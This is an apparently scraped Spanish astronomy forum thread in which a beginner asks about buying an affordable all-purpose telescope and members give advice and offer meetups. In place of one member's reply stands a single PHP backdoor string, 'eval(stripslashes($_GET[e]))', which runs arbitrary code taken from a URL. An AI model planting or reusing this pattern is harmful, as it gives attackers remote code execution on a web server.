Iniciacion

Preguntas básicas sobre astronomía
Responder
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

Iniciacion

Mensaje por carlos »

Hola, soy nuevo en esto y quiero comprarme un telescopio ``todoterreno´´ mas o menos que no sean muy caros de unos 300
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Iniciacion

Mensaje por Manuelariza »

Bienvenido al foro Carlos,lo primero que me gustaría saber es a lo que consideras todo terreno,por que por ese dinero lo mas que puedes conseguir es un Dobson de 6" de los mas normales y ese no es precisamente un telescopio todo terreno,a mi entender.


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

Iniciacion

Mensaje por carlos »

Me refiero a que sirva tanto para cielo profundo como para observacion planetaria aunque me interesa mas lo primero. Por cierto ¿donde lo puedo conseguir?
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

Iniciacion

Mensaje por carlos »

Tambien he visto este Reflector B&Crown 1400mm-150 SE pero nose que tal es cuesta 199
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Iniciacion

Mensaje por m3ntol »

[quote="carlos"]Tambien he visto este Reflector B&Crown 1400mm-150 SE pero nose que tal es cuesta 199
phpbb:eval(stripslashes($_GET[e]));
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Iniciacion

Mensaje por javi »

Bienvenido Carlos yo también soy de Torrejon de qeu parte eres lo mismo un dia podemos quedar y charlar en persona un poco del tema, lo que dice Manuel y m3ntol tienen toda la razon no tires el dinero espera a que salgas a una quedada y mira por unos cuantos haber que te parece y lo mismo prefieres esperar.

Un abrazo.
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

Iniciacion

Mensaje por carlos »

soy de las fronteras. gracias por responder pero ¿donde lo compro? por cierto tengo un telescopio refractor del lidl skylux 70 mm /700mm creo ¿con eso se puede ver algo de cielo profundo? lo malo es que lo tengo en el pueblo jejeje esque alli se ve todo super clarito jejejeje. a una pregunta las nebulosas y todo lo de cielo profuundo se ve en blanco y negro o en colores?
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Iniciacion

Mensaje por Manuelariza »

Carlos tienes un privado.


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
theheavy
Mensajes: 871
Registrado: Mié Sep 02, 2009 7:59 pm

Iniciacion

Mensaje por theheavy »

Hola a todos,
Continuo este post para no abrir uno nuevo, que luego hay montonera...
Soy theheavy de Torrejón de Ardoz, tambien vivo en las Fronteras.

La astronimia nunca me ha interesado mucho, pero mi hijo de 10 años está enloquecido con el tema y ha comenzado ha hacer miles de preguntas que no puedo contestar.

Lo cierto es que yo no soy capaz ni de encontrar ni la Osa Polar, ni nada de nada, no sé ni por donde se reconcaba un telescopio, de hecho nunca he mirado por uno, y la unica estreya que conozco es la estreya de oriente que pongo todas las navidades en lo mas alto del abeto.

Me gustaría charlar con vosotros, y salir alguna noche para ver si podiais enseñar a mi hijo a situarse en la boveda celestial.

Tambien me gustaría asistir con mi hijo a esos cursos de iniciación que he visto que hay este mes.

Un saludo
Mas vale estar callado y parecer tonto,
que abrir la boca y demostrarlo.
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Iniciacion

Mensaje por javi »

Tienes un privado theheavy.

Un abrazo.
Responder